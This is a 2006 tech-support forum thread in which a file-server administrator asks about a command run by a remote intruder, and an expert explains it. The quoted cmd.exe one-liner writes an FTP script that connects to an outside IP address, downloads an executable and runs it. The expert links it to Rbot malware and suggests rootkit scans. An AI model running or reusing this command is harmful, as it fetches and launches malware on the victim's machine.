?
Solved

Command run on file server to connect to FTP Server Windows 2003 Server

Posted on 2006-10-26
3
Medium Priority
?
201 Views
Last Modified: 2010-04-18
Please help the following script was typed into the command run window by a remote user on our file server what does it do if anything


cmd.exe /c del i&echo open 88.112.47.74 7800 > i&echo  >> i &echo get e_00308.exe >> i &echo quit >> i &f

Please Help
0
Comment
Question by:guilogic
[X]
Welcome to Experts Exchange

Add your voice to the tech community where 5M+ people just like you are talking about what matters.

  • Help others & share knowledge
  • Earn cash & points
  • Learn & ask questions
3 Comments
 
LVL 96

Accepted Solution

by:
Lee W, MVP earned 2000 total points
ID: 17812885
It means:

Delete the file "i" if it exists.
echo (write) "open 88.112.47.74 7800" to the file "i"
Then echo "get e_00308.exe" to the file "i"
Then echo "quit"" to the file "i"

then run "f"

So you end up with a file "i" on your computer containing these three lines:

open 88.112.47.74 7800
get e_00308.exe
quit

This is an FTP script.

I saw very similar files on machines infected with malware and Rbot variants (Rbots typically include Root Kit technology).

I strongly suggest you run various AntiSpyware tools AND the tool RootKitRevealer and/or Sophos Root Kit detection tool - www.sophos.com and www.sysinternals.com (for RootKitRevealer)
0

Featured Post

Does Your Cloud Backup Use Blockchain Technology?

Blockchain technology has already revolutionized finance thanks to Bitcoin. Now it's disrupting other areas, including the realm of data protection. Learn how blockchain is now being used to authenticate backup files and keep them safe from hackers.

Question has a verified solution.

If you are experiencing a similar issue, please ask a related question

Scenerio: You have a server running Server 2003 and have applied a retail pack of Terminal Server Licenses.  You want to change servers or your server has crashed and you need to reapply the Terminal Server Licenses. When you enter the 16-digit lic…
ADCs have gained traction within the last decade, largely due to increased demand for legacy load balancing appliances to handle more advanced application delivery requirements and improve application performance.
In this video we outline the Physical Segments view of NetCrunch network monitor. By following this brief how-to video, you will be able to learn how NetCrunch visualizes your network, how granular is the information collected, as well as where to f…
Sometimes it takes a new vantage point, apart from our everyday security practices, to truly see our Active Directory (AD) vulnerabilities. We get used to implementing the same techniques and checking the same areas for a breach. This pattern can re…
Suggested Courses

777 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question